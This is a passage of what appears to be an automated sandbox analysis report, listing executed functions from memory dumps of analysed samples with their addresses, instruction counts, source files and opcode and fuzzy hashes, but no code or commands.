                            Function 00A40C78 Relevance: .0, Instructions: 29COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2012545762.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_a40000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 416f32ada5bed4d0c68ae61c7162d5ab422b965e4e95562a906f7def9103e12e
                            • Instruction ID: b8d1fd712a43671148c76a8e144fe3d425c83fbf648a5740e6574b35663120d0
                            • Opcode Fuzzy Hash: 416f32ada5bed4d0c68ae61c7162d5ab422b965e4e95562a906f7def9103e12e
                            • Instruction Fuzzy Hash: ABF058B4E092489ECB00EFB99595A9DBFF0EF9A300F14D9AAC044E7201EA304A00DF02
                            Function 00A40848 Relevance: .0, Instructions: 28COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2012545762.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_a40000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 871e9b09751f677c8e4d84e8f31e6b6f89494e33df260dd668cb797bd0f4e28e
                            • Instruction ID: 58301d475c59ebd57162cd23095fbf9aaad7c689aa70b6a2dcef2635ae1b6c4f
                            • Opcode Fuzzy Hash: 871e9b09751f677c8e4d84e8f31e6b6f89494e33df260dd668cb797bd0f4e28e
                            • Instruction Fuzzy Hash: 6BF0B274C10209DFCB45EFA8D980AAEBBB1FB05304F104AAAC415A7360EB715A54DF80
                            Function 00A409A8 Relevance: .0, Instructions: 25COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2012545762.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_a40000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cc5061e5804b91f54b3575445ba8821f2c52e62ab8506e152bf89c10c2caacfd
                            • Instruction ID: c21519e4b14fa7594f6a2db7cd63af14ce9d46ad503a9ed0da7d4455e9a3db02
                            • Opcode Fuzzy Hash: cc5061e5804b91f54b3575445ba8821f2c52e62ab8506e152bf89c10c2caacfd
                            • Instruction Fuzzy Hash: F4F0E57040D2C49FC701EF74E854A9C7F75AB46308F0086EDD505972A3D7B10E00EB12
                            Function 00A409B8 Relevance: .0, Instructions: 20COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2012545762.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_a40000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 93bf75b9dbf538cbf6ce6a45d90525dc97e04e3947f42e6fdcfd7a36549f514c
                            • Instruction ID: 381cba45005f9d62c4ba0733acff46327c784bb2ff5c180721ec5f3cfebb7402
                            • Opcode Fuzzy Hash: 93bf75b9dbf538cbf6ce6a45d90525dc97e04e3947f42e6fdcfd7a36549f514c
                            • Instruction Fuzzy Hash: 94E0CD70905248EFCB00EFB4D944B5D73B9EB46308F008569D60997351DB305F00F741

                            Executed Functions

                            Function 00B304A7 Relevance: .8, Instructions: 824COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2012647817.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_b30000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e630475bb53535a8e1a5ee4ee0fac33556026a817766e8146642a116ad54c7d3
                            • Instruction ID: 037a43ecc6331ee1f3d9f9dd12a0f882ed0b61ab51629285188fdc858e57a452
                            • Opcode Fuzzy Hash: e630475bb53535a8e1a5ee4ee0fac33556026a817766e8146642a116ad54c7d3
                            • Instruction Fuzzy Hash: 4E41487181E3C49FD7039B3898A55DA3FB0AE03214B2A41DBC480DF1A3D639490EDBA6
                            Function 00B30562 Relevance: .4, Instructions: 395COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2012647817.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_b30000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 72a8a0c05070849324e03eaabbf7cbeaaf07abae701d54bd9d4c19cdbcfec2ba
                            • Instruction ID: aa875c2681b04414e8ad969678c2105584a52be064800fbd86156c867916e856
                            • Opcode Fuzzy Hash: 72a8a0c05070849324e03eaabbf7cbeaaf07abae701d54bd9d4c19cdbcfec2ba
                            • Instruction Fuzzy Hash: C5014C3080A3899FCB06DFB8D8615DD7FB0EF07200B1946EBD444EB2A2E7345A19DB81
                            Function 00B30540 Relevance: .4, Instructions: 373COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2012647817.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_b30000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 22f83f5eb1c8c1466d55b3008996ddb7bf81841e75c59e26a0c3f89e8880bcb6
                            • Instruction ID: 2feae31f974eb70aa176e52d8467465fafe04d8843147a4cb698bf620e9da3fb
                            • Opcode Fuzzy Hash: 22f83f5eb1c8c1466d55b3008996ddb7bf81841e75c59e26a0c3f89e8880bcb6
                            • Instruction Fuzzy Hash: 1811397080A3899FCB06DF78D8655DD7FB0EF07200B1545EBC440DB2A2E7345A09DB91
                            Function 00B30A40 Relevance: .2, Instructions: 160COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2012647817.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_b30000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b57c9b0458563e50400ffb1319d53308a8b8b88c246faa099e8de9b886c98da1
                            • Instruction ID: 2d0e37cd556fdbdd366f5bb9609b958a6ce707145f96b77925e0d11f28fadb7e
                            • Opcode Fuzzy Hash: b57c9b0458563e50400ffb1319d53308a8b8b88c246faa099e8de9b886c98da1
                            • Instruction Fuzzy Hash: C561B274A112089FCB04DFA9D994ADDBBF6FF89310F209669E405AB365DB30AD41CF50
                            Function 00B30DA0 Relevance: .1, Instructions: 80COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2012647817.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_b30000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9577bb5ea6baa0a8627b5077e7d3cc44ee175f7f4b035486594f3d8b10d5efa6
                            • Instruction ID: cf2bca5fd4a7198edd00d0069aecdcbb15a886479fe15daa476afc39d5c3dba1
                            • Opcode Fuzzy Hash: 9577bb5ea6baa0a8627b5077e7d3cc44ee175f7f4b035486594f3d8b10d5efa6
                            • Instruction Fuzzy Hash: 9131B9B9D052589FCB10CFA9E980ADEFBF0AF09310F24845AE414B7310D374AA05CF64
                            Function 00B30A32 Relevance: .1, Instructions: 78COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2012647817.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_b30000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e88f8a1d9116f1503abb8ed5af7ee1af4af4dca138d3de99e457ac872ef3cfc4
                            • Instruction ID: f5097d1df4bed772bc391b89cc562ea3f86793becac46c5e1c8d965aa977032a
                            • Opcode Fuzzy Hash: e88f8a1d9116f1503abb8ed5af7ee1af4af4dca138d3de99e457ac872ef3cfc4
                            • Instruction Fuzzy Hash: 39313634D112089FDB04DFA9D894ADDBBF6FF89310F2486AAD406BB264DB309A45CF50
                            Function 00B30DA8 Relevance: .1, Instructions: 78COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2012647817.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_b30000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 310b0d59b4a4a21ca57481e0d0e140d3ec2bd2f4a38edfca217479af59a42d05
                            • Instruction ID: db45b9d5146edc58290b360d7704125f57b37bb25077bf988f7f6e7fb16e0359
                            • Opcode Fuzzy Hash: 310b0d59b4a4a21ca57481e0d0e140d3ec2bd2f4a38edfca217479af59a42d05
                            • Instruction Fuzzy Hash: A731A9B9D012589FCB10CFA9E984ADEFBF0AB09310F24946AE814B7310D374AA45CF64
                            Function 00B308A0 Relevance: .1, Instructions: 65COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2012647817.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_b30000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: aeaf8b858a6591c6594ef0d3e31db7b340f0ea567034fa2579c42c96ffa582d2
                            • Instruction ID: 8c7d34975d95375136860ea10db38f9ea382ceb6194618582ccd2159aa23cce3
                            • Opcode Fuzzy Hash: aeaf8b858a6591c6594ef0d3e31db7b340f0ea567034fa2579c42c96ffa582d2
                            • Instruction Fuzzy Hash: 37214831D0028A9FCF05DFA8D8509DDFBB1FF49314F4585AAD460BB2A2D730AA06CB91
                            Function 00ADD01D Relevance: .0, Instructions: 45COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2012331737.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_add000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d34a4013d2c121034cb17dae396c0dc9cf3e162827355389c22857823b092e54
                            • Instruction ID: 353812d604aa56f226def0a71b3bdae2a0c3c6ae03adb2a05298df4b69d3266d
                            • Opcode Fuzzy Hash: d34a4013d2c121034cb17dae396c0dc9cf3e162827355389c22857823b092e54
                            • Instruction Fuzzy Hash: EE01F231404300AFE7108F21CC80B66BBA8DF81320F18C02BEC0B4A382C2799901CAB2
                            Function 00ADD005 Relevance: .0, Instructions: 43COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2012331737.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_add000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4ec04919cf8c35d6d5e86fa3f9b8c8153da0167ae6e24c942e257b94b3bf2b8e
                            • Instruction ID: df3fb25e6508a639e89ff567b68b07165326fd18b219c8214a23ce513b16f343
                            • Opcode Fuzzy Hash: 4ec04919cf8c35d6d5e86fa3f9b8c8153da0167ae6e24c942e257b94b3bf2b8e
                            • Instruction Fuzzy Hash: 48014C6100E3C05FD7168B218994B52BFB4EF53224F18C1DBD8898F2A3C2699849C7B2
                            Function 00B30E88 Relevance: .0, Instructions: 36COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2012647817.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_b30000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1a483dfa2456d87886b45345318657c27ba707fa6836d5fb70f0d95c7678d31d
                            • Instruction ID: a4df60152be8031e4d4d0af5df491ab371d1e142abeced3a3d9d73e7f8961d3c
                            • Opcode Fuzzy Hash: 1a483dfa2456d87886b45345318657c27ba707fa6836d5fb70f0d95c7678d31d
                            • Instruction Fuzzy Hash: 70F0543170A2405FC745CB69E85096ABFF6EFCA250728C19FE88ACB752C6319C06CB51
                            Function 00B30C78 Relevance: .0, Instructions: 29COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2012647817.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_b30000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0b3161276d96c7d347605590aa910e70939d25078378a41e80a28f04a6bafe0d
                            • Instruction ID: ca825179bae9e3eed06afacd6e1974f5f3a57b6c6a39312f9384a0eb182fe103
                            • Opcode Fuzzy Hash: 0b3161276d96c7d347605590aa910e70939d25078378a41e80a28f04a6bafe0d
                            • Instruction Fuzzy Hash: 78F058B0E142489ECB00EFB994A569DBFF0EF9A300F2495EAC044E7201EA304A01DF01
                            Function 00B30848 Relevance: .0, Instructions: 28COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2012647817.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_b30000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bf078318185c6dfef04949ff0d0240a8798fbfe97e7d71d4c3df07f8fae63b57
                            • Instruction ID: 7be739e46a47b3d1aa82249bcf570b113931766f3cd638ddc0b39b26e5b90390
                            • Opcode Fuzzy Hash: bf078318185c6dfef04949ff0d0240a8798fbfe97e7d71d4c3df07f8fae63b57
                            • Instruction Fuzzy Hash: D0F0B270D00209EFCB45EFA8D880AEEBBB5FF09304F1046AAC415A7260EB715A44CF80
                            Function 00B309A8 Relevance: .0, Instructions: 25COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2012647817.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_b30000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fea692337bb71d3ba70db114f94a97fa85652fa8cc12cf96dfcb12939eb6f7ff
                            • Instruction ID: dee8f64530c25b8437dc36658476441e81f3a2f0b83e735dff1b90c469fe0d33
                            • Opcode Fuzzy Hash: fea692337bb71d3ba70db114f94a97fa85652fa8cc12cf96dfcb12939eb6f7ff
                            • Instruction Fuzzy Hash: AAF0A0709062C4AFCB01EBB4E814B9C7FB5AB0A308F1002E9D405972A2D6700E05DB42
                            Function 00B309B8 Relevance: .0, Instructions: 20COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2012647817.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_b30000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9fec3e264688b9d6a88daaa541efc39d22d6361866421cdd206bec3406fbbea2
                            • Instruction ID: 4215698e41c8a3a06d8efd99017d6fd9513eca23ddcfeddd217630cb6d24198b
                            • Opcode Fuzzy Hash: 9fec3e264688b9d6a88daaa541efc39d22d6361866421cdd206bec3406fbbea2
                            • Instruction Fuzzy Hash: 9EE08C70902248EFCB00FFB8E944B9DB3B9EB0A308F1046A9D909A7351DB301E00DB82

                            Executed Functions

                            Function 007F09B8 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.2012557913.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_7f0000_cEp3d38.jbxd
                            Similarity
                            • API ID:
                            • String ID: \Qv
                            • API String ID: 0-2149693146
                            • Opcode ID: 4aed6b2274c9ba7cb615c7646dda75852afeeb53d80c656627eeab26d9c0f210
                            • Instruction ID: 8521af4473c6a836df5aecd235d24dfc10fc39b69807f8db5890cbf60046fc46
                            • Opcode Fuzzy Hash: 4aed6b2274c9ba7cb615c7646dda75852afeeb53d80c656627eeab26d9c0f210
                            • Instruction Fuzzy Hash: EEE04F7090120CEFCB44EFA8D904B9DB3B5EB06309F108568D80993251DBB41E00AB85
                            Function 007F0540 Relevance: .7, Instructions: 742COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.2012557913.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_7f0000_cEp3d38.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e1a57631f9c98b846d2bf8b7ccff10a8a8c59f686b425c17971eb0bf193b1144
                            • Instruction ID: 5d76a5c1978f30dcbe76fdbf302cd408be2151f43b1d89acb2bf0ce35463d979
                            • Opcode Fuzzy Hash: e1a57631f9c98b846d2bf8b7ccff10a8a8c59f686b425c17971eb0bf193b1144
                            • Instruction Fuzzy Hash: 41214F75C0E3889FC703DB7898645ED7FB0AE03204B0945EBC494DB3A3E6795919CB95
                            Function 007F04A7 Relevance: .4, Instructions: 448COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.2012557913.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_7f0000_cEp3d38.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c8a97f4db32d5975cf3d67609c02eef06e7fc0f412fcceb1f5f1190adb7f9fd7
                            • Instruction ID: 60a6ab54a78f502184ad233c24039ff5f99ac5df97e0c2b33040934c081cdcc8
                            • Opcode Fuzzy Hash: c8a97f4db32d5975cf3d67609c02eef06e7fc0f412fcceb1f5f1190adb7f9fd7
                            • Instruction Fuzzy Hash: 84314F7181E3D55FD703DB7898A05ED7FB0AE43214B1941DBC090CB2A3E679490ACBA6
                            Function 007F0A40 Relevance: .2, Instructions: 160COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.2012557913.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_7f0000_cEp3d38.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4ba2c0572ac3547ec54fea5efe531147a287a20354218c761b220bd6cff796a4
                            • Instruction ID: 5a5ac477ed7a92900fd9e76493643f424bee8c8063134d6108662ec032a3ffe1
                            • Opcode Fuzzy Hash: 4ba2c0572ac3547ec54fea5efe531147a287a20354218c761b220bd6cff796a4
                            • Instruction Fuzzy Hash: 8A61D274A01208DFCB04DFA9D9849EDB7F6FF89310B208529E405AB365DB74AD41CF94
                            Function 007F0DA8 Relevance: .1, Instructions: 78COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.2012557913.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_7f0000_cEp3d38.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: baa066cb50bf71832e8ec3376e8eb1cd33db74ef98bd0ece0e414b2da68198f5
                            • Instruction ID: 771ba428d3b7e9c2f15e5b2906aa8dc46f376c930cca9acbc74cc91fb6c04b2e
                            • Opcode Fuzzy Hash: baa066cb50bf71832e8ec3376e8eb1cd33db74ef98bd0ece0e414b2da68198f5
                            • Instruction Fuzzy Hash: 6B31AAB9C052189FCB10CFA9D984AEEFBF0AB09310F24946AE414B7310D378A945CF64
                            Function 007F08A0 Relevance: .1, Instructions: 69COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.2012557913.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_7f0000_cEp3d38.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f2b4e20a0ec492db1ef3aae419b1aea7423545b6e92a26d8b4d566486eda9f02
                            • Instruction ID: 315700c09807688fc69a2d28db29f9d3dd2e1f8ac342f1493f11dcd15b1f359a
                            • Opcode Fuzzy Hash: f2b4e20a0ec492db1ef3aae419b1aea7423545b6e92a26d8b4d566486eda9f02
                            • Instruction Fuzzy Hash: 1D212431D0024E9FCB05DFA8D840AEDFBB1EF49310F4582A6D561BB361DB74A906CB94
                            Function 0075D005 Relevance: .0, Instructions: 47COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.2012334237.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_75d000_cEp3d38.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7688dbedad6a0ee46d41359488b0f94a17f96eeec4ac4d6ed462f6d5cfe21ce4
                            • Instruction ID: eb8152150fdd933cbc49bf29742624e99e2471be0cd74306942b07a7007a7def
                            • Opcode Fuzzy Hash: 7688dbedad6a0ee46d41359488b0f94a17f96eeec4ac4d6ed462f6d5cfe21ce4
                            • Instruction Fuzzy Hash: 89015B614093C05FE7228B258C84792BFA8DF43225F0980DBE8888F2E3C2A95C49C772
                            Function 0075D01D Relevance: .0, Instructions: 45COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.2012334237.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_75d000_cEp3d38.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c4dbeafed65c190b1da780a5fa74c13afe981e8d4ad90c8b0cd43a757b21c4ba
                            • Instruction ID: 504710345e70d85673fda6b6fdafbe00ddf074378c16ebd01097ccf190f3ba5e
                            • Opcode Fuzzy Hash: c4dbeafed65c190b1da780a5fa74c13afe981e8d4ad90c8b0cd43a757b21c4ba
                            • Instruction Fuzzy Hash: F201A2315043449BE7309B65C984BA6BBD8DF41326F18C45AED4D4A2C2C6BD9D49CAB2
                            Function 007F0C78 Relevance: .0, Instructions: 30COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.2012557913.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_7f0000_cEp3d38.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6943bc90046646b651105847403b79c9b04ecb951e8ef61c02956acb33cc5ca2
                            • Instruction ID: 344847be170ade2cc79dbe2fa943cb4b44c85c56062b5f032cdb106b3a7bab2d
                            • Opcode Fuzzy Hash: 6943bc90046646b651105847403b79c9b04ecb951e8ef61c02956acb33cc5ca2
                            • Instruction Fuzzy Hash: FAF09A70D09348AFCB41DBB594556ADBFF0AF46300F1484EAC004E3302EA784614DF41
                            Function 007F0848 Relevance: .0, Instructions: 28COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.2012557913.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_7f0000_cEp3d38.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a568451834fed41ad3f4f68e52f5514be209bf4c184e8210e56995f8fdbeee6f
                            • Instruction ID: b9b62a2465e4752d5b2ecec053d8577fd741d256dd67000a5b263b903116f42c
                            • Opcode Fuzzy Hash: a568451834fed41ad3f4f68e52f5514be209bf4c184e8210e56995f8fdbeee6f
                            • Instruction Fuzzy Hash: 74F0B274C00209DFCB45EFA8D840AAEBBB1FB05304F1486AAC415A7360EBB55A44CF80